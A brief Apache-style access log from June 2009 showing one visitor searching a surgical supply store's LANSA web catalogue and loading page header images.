134.58.253.57 - - [24/Jun/2009:05:19:05 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):02 HTTP/1.1" 200 52086 "http://www.acesurgical.com/nuoss_collagen.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:23 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):02 HTTP/1.1" 200 52086 "http://www.acesurgical.com/nuoss_collagen.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:27 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:27 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
